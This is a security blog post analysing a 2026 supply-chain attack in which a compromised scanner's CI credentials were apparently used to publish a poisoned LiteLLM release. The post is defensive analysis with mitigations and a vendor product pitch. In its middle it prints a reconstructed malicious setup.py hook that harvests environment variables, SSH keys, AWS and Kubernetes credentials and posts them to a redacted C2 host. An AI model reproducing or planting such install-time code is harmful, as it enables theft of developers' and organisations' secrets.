The Scanner Was the Weapon

How TeamPCP turned a security tool into the master key for five package ecosystems — and what it means for every team deploying AI.

Founder, SPR{K}3 Security Research

  • LiteLLM — an AI key proxy with 97M+ monthly downloads — was poisoned via a ghost release: a PyPI version with no GitHub source, no tag, no review trail
  • The attacker first compromised Trivy (a security scanner), used its CI credentials to poison LiteLLM — a second-order trust inversion
  • The malware fired on pip install — no import needed — harvesting SSH keys, cloud tokens, Kubernetes secrets, and every AI provider API key at once
  • Only detected because sloppy code caused RAM exhaustion. Clean malware would have run for months.
  • TeamPCP has announced more targets ahead
  • SPR{K}3’s existing behavioral_e5 already catches this; Ora v37.19.1 adds blast-radius scoring so the right findings get CRITICAL priority

There is a class of software whose compromise is categorically worse than ordinary supply chain attacks. Not because the code is more complex or the vulnerability more novel, but because of what the software holds. LiteLLM is a proxy that routes requests to OpenAI, Anthropic, Google, AWS, Azure, Cohere, Mistral, and a dozen other AI providers. Every API key, in one place, behind one package.

When an attacker poisons that package, they don’t steal one credential. They steal the entire organization’s AI infrastructure in a single pip install.

That is what happened in March 2026. And the attack chain, once you see the full sequence, is one of the most deliberately constructed pieces of malicious infrastructure we’ve analyzed. This is not simply a supply chain attack. It is a trust topology failure — a systematic exploitation of the way modern AI organizations have wired their dependency graphs and their security pipelines into the same trust surface.

97M monthly downloads

5 ecosystems compromised

2 wks full campaign duration

The Kill Chain

TeamPCP did not start with LiteLLM. They started with Trivy.

Trivy is a security scanner. Organizations use it inside their CI/CD pipelines to scan container images, filesystems, and repositories for vulnerabilities. It runs with elevated permissions, has access to cloud credentials, registry tokens, and infrastructure secrets — because it needs them to do its job. It is trusted implicitly by every system that invokes it.

On March 19, 2026, TeamPCP compromised Trivy’s CI pipeline. This gave them the credentials that Trivy’s maintainers use to publish packages. From there, the chain unfolded precisely.

ATTACK SEQUENCE — TEAMPCP / LITELLM (MARCH 2026)

01. Trivy CI compromised. The security scanner’s pipeline is breached. Publishing credentials exfiltrated. The scanner’s trust chain is now the attacker’s trust chain.

02. LiteLLM CI poisoned. LiteLLM’s pipeline used Trivy for scanning. The stolen credentials unlock LiteLLM’s publishing infrastructure directly.

03. Ghost release published to PyPI. A new LiteLLM version is uploaded — no GitHub tag, no source commit, no code review. It exists only as a binary in the registry.

04. Payload fires on install. A startup hook executes the moment the package is installed. No import required. Stage 1: harvest SSH keys, cloud tokens, Kubernetes secrets, .env files, crypto wallets. Stage 2: deploy privileged containers. Stage 3: install a persistent backdoor.

05. Detected only by accident. Sloppy malware code exhausted system RAM. A developer noticed their machine dying, investigated, and found LiteLLM had arrived as a transitive dependency of a Cursor MCP plugin they hadn’t knowingly installed.

  ATTACKER
      │
      ▼
  [ Trivy CI ]  ← security scanner, trusted by all pipelines
      │  credentials stolen
      ▼
  [ LiteLLM PyPI ]  ← ghost release, no GitHub source
      │  startup hook fires on pip install
      ▼
  [ Developer Machine ]  ← via Cursor MCP plugin (transitive dep)
      │
      ├── SSH private keys
      ├── .env / cloud tokens / IAM credentials
      ├── Kubernetes cluster secrets
      └── ALL AI provider API keys  ←  entire org blast radius

The campaign then extended to GitHub Actions, Docker Hub, npm, and Open VSX. Five ecosystems in two weeks — each breach providing credentials to unlock the next.

“The crash is the only reason thousands of companies aren’t fully exfiltrated right now. If the code had been cleaner, nobody notices for weeks. Maybe months.”

What Actually Ran on Your Machine

The malware payload executed through a startup hook — code Python runs automatically during package installation, before any application code, before any import statement, the moment pip install completes. The reconstructed pattern (simplified from incident reports) looked like this:

SETUP.PY — MALICIOUS STARTUP HOOK (RECONSTRUCTED)

import os, socket, base64, threading
try:
    import requests
except ImportError:
    requests = None   # exfiltration silently skipped if unavailable

def _harvest():
    # Stage 1: collect everything of value
    data = {
        "env":  dict(os.environ),           # ALL env vars: API keys, tokens, secrets
        "host": socket.gethostname(),
    }
    # SSH keys, cloud credentials, kubeconfig, crypto wallets
    for path in [
        "~/.ssh/id_rsa", "~/.aws/credentials",
        "~/.kube/config", "~/.config/gcloud/credentials.db"
    ]:
        try:
            with open(os.path.expanduser(path), "rb") as fh:
                data[path] = fh.read()
        except OSError:
            pass

    # Exfiltrate to C2 before any application code runs
    if requests is not None:
        requests.post("https://[REDACTED C2]",
            data=base64.b64encode(repr(data).encode()),
            timeout=5)

# Fires silently on install — no import, no user interaction
threading.Thread(target=_harvest, daemon=True).start()

# ↑ This thread had a memory leak.
# ↑ RAM exhaustion. Machine started dying. Developer noticed.
# ↑ The only reason this was discovered at all.

The critical property: os.environ at install time in a CI pipeline contains everything. The OPENAI_API_KEY, the ANTHROPIC_API_KEY, AWS access keys, GitHub deploy tokens, container registry passwords — all of it, dumped in a single dictionary, exfiltrated before a single line of application code ran. The hook didn’t need to know what keys you had. It took everything and sorted it out server-side.

Why os.environ is the entire game: Modern CI pipelines inject all secrets as environment variables to keep them out of code. The effect is to concentrate every credential an organization has into a single dictionary, readable by any package that loads at install time. The attacker doesn’t need to target your specific keys — they harvest the dictionary wholesale.
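To make that concentration concrete, a few lines of Python can enumerate the secret-shaped variables any install hook would see. This is a defensive sketch; the marker list and the `secret_shaped_vars` helper are illustrative, not taken from the incident tooling.

```python
import os

# Substrings that commonly mark secret-bearing variables (illustrative list).
SECRET_MARKERS = ("KEY", "TOKEN", "SECRET", "PASSWORD", "CREDENTIAL")

def secret_shaped_vars(env):
    """Names of environment variables that look like they hold secrets."""
    return sorted(
        name for name in env
        if any(marker in name.upper() for marker in SECRET_MARKERS)
    )

# Against a live CI environment this is typically dozens of names:
print(secret_shaped_vars(os.environ))   # names only; never log the values
```

Running this inside a CI job is a cheap way to audit how much a malicious install hook would have harvested.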

The Credential Aggregator Risk Class

Supply chain attacks are not new. What is new is the specific blast radius of AI infrastructure packages. A decade ago, a poisoned utility library might give an attacker execution on developer machines. The credentials at stake were limited.

The architecture of modern AI deployment has created a new category of target: the credential aggregator. LiteLLM is the canonical example, but the class includes any package whose entire purpose is routing requests between AI providers — holding every key in one place as a convenience feature. The feature that makes the product useful is exactly the feature that makes it catastrophic to compromise.

BLAST RADIUS — SINGLE COMPROMISED LITELLM INSTALL (CI PIPELINE)

One developer’s machine. One transitive dependency from a Cursor plugin. One CI run with org-wide secrets injected as environment variables.

  • All OpenAI API keys
  • All Anthropic keys
  • Google / Vertex AI keys
  • AWS IAM credentials
  • Azure OpenAI tokens
  • Kubernetes cluster access
  • Container registry push rights
  • GitHub deploy tokens

Estimated exposure: $50K–$500K in API spend abuse within 24 hours, plus full infrastructure access for persistent backdoor deployment. Dwell time if malware had been clean: weeks to months.

This is not credential theft at scale. It is a wholesale acquisition of an organization’s entire AI operations budget and infrastructure access, in a single pip install that nobody made a conscious decision to run.

THE TRANSITIVE DEPENDENCY PROBLEM

The developer who found this attack did not install LiteLLM. They installed a Cursor MCP plugin. That plugin had a dependency. That dependency had a dependency. LiteLLM arrived three layers deep, invisible, trusted by default because everything above it was trusted.

This is not a packaging bug. It is the designed behavior of a system optimized for convenience. Every AI agent, copilot, and internal tool built in the past two years carries a dependency tree nobody has fully audited. Credential aggregators are especially dangerous here because they naturally appear as transitive dependencies of anything that touches an AI provider.
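Making that three-layers-deep path visible is a graph walk over the dependency tree. A minimal sketch over a pre-built requires map (package → direct dependencies); in a real audit you would populate the map from `importlib.metadata`, and the package names below are hypothetical stand-ins for the incident's chain.

```python
from collections import deque

def dependency_paths(requires, root, target):
    """Return every path from `root` to `target` through the requires map."""
    paths, queue = [], deque([[root]])
    while queue:
        path = queue.popleft()
        for dep in requires.get(path[-1], []):
            if dep in path:          # guard against dependency cycles
                continue
            if dep == target:
                paths.append(path + [dep])
            else:
                queue.append(path + [dep])
    return paths

# Hypothetical graph mirroring the incident: a plugin pulls in litellm
# three layers deep without the developer ever naming it.
requires = {
    "cursor-mcp-plugin": ["agent-toolkit"],
    "agent-toolkit": ["llm-router"],
    "llm-router": ["litellm"],
}
print(dependency_paths(requires, "cursor-mcp-plugin", "litellm"))
# → [['cursor-mcp-plugin', 'agent-toolkit', 'llm-router', 'litellm']]
```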

The Ghost Release Pattern

The most technically significant aspect of this attack is not the malware payload. It is the delivery mechanism — and it deserves a formal name and definition, because it represents a detection gap that most supply chain tooling does not address.

ATTACK CLASS DEFINITION — SOURCE-DETACHED RELEASE

A source-detached release (colloquially: a ghost release) is a package version published to a distribution registry that has no verifiable correspondence to any source-controlled commit, tag, or reviewable artifact.

  • PRESENT: Version exists in PyPI registry
  • MISSING: No matching Git tag in source repository
  • MISSING: No commit hash in release metadata
  • MISSING: No SBOM or artifact lineage record
  • MISSING: No review trail — release cannot be diffed against any prior state
  • UNDETECTED: Passes all existing dependency scanners — they scan known code, not registry divergence

This is the attack vector that most supply chain security tools are blind to. Scanners that analyze repository code never see it. Hash verification only helps if you were already pinning to a hash. Trivy — the tool that was supposed to catch this — had been compromised. And even a clean Trivy would not have flagged a ghost release, because ghost releases are not a vulnerability class it was designed to detect.

ORA E33-AL — GHOST RELEASE DETECTION (CONCEPTUAL)

# Ghost release: exists in registry, absent from source
litellm==1.x.x  ✓  present in PyPI
litellm==1.x.x  ✗  no matching GitHub tag
litellm==1.x.x  ✗  no commit hash in release metadata
litellm==1.x.x  ✗  no source diff possible

# Detection: PyPI JSON API → project_urls.Source
# → GitHub tags API → if version has no tag → CRITICAL
# chain_sig: PyPI→NoTag→Unreviewed→StartupExec→Exfil

The ghost release pattern is independently publishable as a detection category. Organizations that want to protect against this class need one check that almost no CI pipeline currently performs: does this version of this package correspond to a reviewable source commit? For credential aggregators, this check should be mandatory before any install.
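Once the two lists are in hand, the check itself reduces to a small set comparison. A sketch of the matching step, assuming you have already fetched the published versions from the PyPI JSON API and the tag names from the GitHub tags API (both network calls omitted here):

```python
def ghost_releases(published_versions, git_tags):
    """Versions present in the registry with no corresponding source tag.

    Tags commonly carry a 'v' prefix (v1.2.3), so both forms are accepted.
    """
    tag_versions = {tag.lstrip("v") for tag in git_tags}
    return [v for v in published_versions if v not in tag_versions]

# Hypothetical data: one release exists only in the registry.
published = ["1.40.0", "1.40.1", "1.99.9"]
tags = ["v1.40.0", "v1.40.1"]
print(ghost_releases(published, tags))   # → ['1.99.9']
```

Any non-empty result for a credential-aggregator package should block the install until a human has explained the divergence.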

The Scanner as Transitive Trust Amplifier

Security teams add scanners to their CI pipelines to protect against supply chain attacks. The scanner is the defense. But a scanner that runs in CI has exactly the same properties as any other CI dependency: it needs credentials to function, it runs with elevated permissions, it is trusted implicitly by every pipeline that invokes it.

TeamPCP’s method was to attack the scanner first. Not because Trivy was the target, but because Trivy had access to the credentials needed to reach the next target. The security tool became the initial access vector for a second-order compromise that was invisible to any scanner-based defense.

But the danger goes further than stolen credentials. A scanner doesn’t just hold secrets — it propagates trust into downstream pipelines. When Trivy reports a package clean, that verdict flows into build systems, deployment gates, and developer workflows. Compromise the scanner, and you don’t just steal credentials. You rewrite the trust decisions of every pipeline that consumes its output.

The structural problem: Compromising a scanner doesn’t just expose credentials — it rewrites the trust decisions of every pipeline that consumes its output. A clean bill of health from a poisoned scanner is indistinguishable from a genuine one. You cannot use the scanner to detect the scanner’s own compromise. The defense eliminates itself.

The only stable solution is to treat your security tooling with the same adversarial skepticism you apply to any untrusted dependency. Hash-pin it, verify its source against published tags, and isolate its credential scope to the minimum required. The scanner in your CI is a credential store. Treat it accordingly.
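Hash-pinning the scanner itself is a one-line comparison once the expected digest is recorded. A minimal sketch using `hashlib`; the artifact path and pinned digest you would pass in are placeholders, not values from the incident.

```python
import hashlib

def sha256_bytes(data):
    """Hex SHA-256 digest of a byte string."""
    return hashlib.sha256(data).hexdigest()

def verify_artifact(path, pinned_sha256):
    """Compare a downloaded artifact against its pinned SHA-256 digest."""
    with open(path, "rb") as fh:
        return sha256_bytes(fh.read()) == pinned_sha256
```

pip enforces the same property natively when requirements files carry `--hash=sha256:<digest>` lines and the install runs with `--require-hashes`.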

What Ora Already Knew

When I analyzed this attack against SPR{K}3’s pattern database, the first thing I checked was whether our existing detection would have fired. The answer is yes — with a caveat that illuminates a problem most security tooling shares.

Ora’s behavioral_e5 engine detects exactly two pattern classes directly relevant here: malicious_setup.py_code_execution and unpinned_dependency. The first catches code that executes at install time via setup hooks. The second flags requirements files where high-risk packages aren’t pinned with hash verification. These patterns have 70 and 4,377 connections, respectively, in our pattern dependency graph. The attack class was already mapped.

“The gap was not in detection. It was in triage prioritization.”

An unpinned_dependency finding on a random utility library and an unpinned_dependency finding on litellm looked identical in our output. Both were HIGH severity. Both got the same bounty estimate. The blast radius difference — orders of magnitude apart — was invisible to the scoring system.

WHAT V37.19.1 CHANGES

Ora v37.19.1 adds credential-aggregator blast-radius scoring as a post-processing pass. When a supply-chain execution pattern fires against a package in the credential aggregator class, the finding is automatically elevated to CRITICAL with R₀=2.1 — epidemic range in our biological scoring model — and the LiteLLM/TeamPCP chain signature.

ORA V37.19.1 — TAG 5: CREDENTIAL AGGREGATOR BLAST-RADIUS SCORING

# No new engine. No new patterns. Zero added scan time.
# behavioral_e5 already fires. We changed what it means.

if _is_supply_chain_exec_pattern(finding):
    if _is_credential_aggregator(finding):
        # litellm, openai, anthropic, langchain, boto3...
        finding['severity']     = 'CRITICAL'
        finding['darwin_r0']    = 2.1   # epidemic: each install exposes all provider keys
        finding['blast_radius'] = 'credential_aggregator'
        finding['chain_sig']    = 'PipInstall→CredentialAggregator→AllKeysCompromised'

    elif _is_security_tooling_ci(finding):
        # trivy, bandit, semgrep, checkov — scanner as CI dep
        finding['severity']  = 'HIGH'
        finding['darwin_r0'] = 1.6   # spreading: CI creds unlock next target
        finding['chain_sig'] = 'SecurityTool→CICredentials→2ndOrderPoison'

The attack class was already detected. We made the prioritization match the actual risk.
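Filled out with the helper predicates the excerpt above leaves undefined, the pass is a few lines of dictionary post-processing. A runnable sketch; the two package lists are illustrative stand-ins, not Ora's actual classification tables.

```python
# Illustrative package lists — not Ora's actual classification tables.
CREDENTIAL_AGGREGATORS = {"litellm", "langchain", "openai", "anthropic", "boto3"}
SECURITY_CI_TOOLS = {"trivy", "bandit", "semgrep", "checkov"}

def score_blast_radius(finding):
    """Escalate supply-chain execution findings by what the package holds."""
    pkg = finding.get("package", "").lower()
    if finding.get("pattern") != "malicious_setup.py_code_execution":
        return finding   # not a supply-chain execution finding; untouched
    if pkg in CREDENTIAL_AGGREGATORS:
        finding.update(severity="CRITICAL", darwin_r0=2.1,
                       blast_radius="credential_aggregator",
                       chain_sig="PipInstall→CredentialAggregator→AllKeysCompromised")
    elif pkg in SECURITY_CI_TOOLS:
        finding.update(severity="HIGH", darwin_r0=1.6,
                       chain_sig="SecurityTool→CICredentials→2ndOrderPoison")
    return finding

finding = {"package": "litellm",
           "pattern": "malicious_setup.py_code_execution",
           "severity": "HIGH"}
print(score_blast_radius(finding)["severity"])   # → CRITICAL
```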

What Security Teams Should Do Now

IMMEDIATE ACTIONS

  • CRITICAL: Audit every MCP plugin installed in developer IDEs (Cursor, Copilot, Windsurf). LiteLLM arrived as a transitive dep of a plugin nobody knew they had.
  • CRITICAL: Hash-pin all AI SDK dependencies (--hash=sha256:<verified>). Ghost releases bypass name+version checks entirely.
  • CRITICAL: Rotate all AI provider API keys now. Any CI env that ran during the exposure window is suspect.
  • HIGH: Verify each PyPI version of security tooling against a source commit. Trivy-class attack: scanner as initial access vector.
  • HIGH: Isolate scanner CI credentials from deploy credentials. Trivy had access to LiteLLM’s publish keys because they shared scope.
  • MEDIUM: Audit transitive dependency trees for all AI agent frameworks. Most teams cannot name what’s 3 levels deep in their agent tooling.

THE STRUCTURAL ISSUE

The deeper problem is architectural. Organizations building AI products have optimized for deployment velocity. Dependency trees are often unknown to the teams that own them. A developer adding a Cursor plugin doesn’t think about what enters their Python environment — that’s not how we’ve trained people to reason about software installation.

Solving this requires treating the AI dependency layer as infrastructure. That means inventory, hash pinning, provenance verification, and explicit review of any package that holds or routes credentials. It is more friction than most teams want. It is less friction than recovering from a full credential compromise.

TeamPCP posted on Telegram after the incident: “many of your favourite security tools and open-source projects will be targeted in the months to come.” The pattern — identify a trusted tool with CI credentials, compromise it, use its credentials to reach the next target — is repeatable indefinitely. Every security scanner and every credential proxy in a CI pipeline is now a valid initial access vector for an attacker who has understood this method.

In 2026, the attack surface
is not your code.
It is your trust.

Published by:


Dan D. Aridor

I hold an MBA from Columbia Business School (1994) and a BA in Economics and Business Management from Bar-Ilan University (1991). Previously, I served as a Lieutenant Colonel (reserve) in the Israeli Intelligence Corps. Additionally, I have extensive experience managing various R&D projects across diverse technological fields. In 2024, I founded INGA314.com, a platform dedicated to providing professional scientific consultations and analytical insights. I am passionate about history and science fiction, and I occasionally write about these topics.
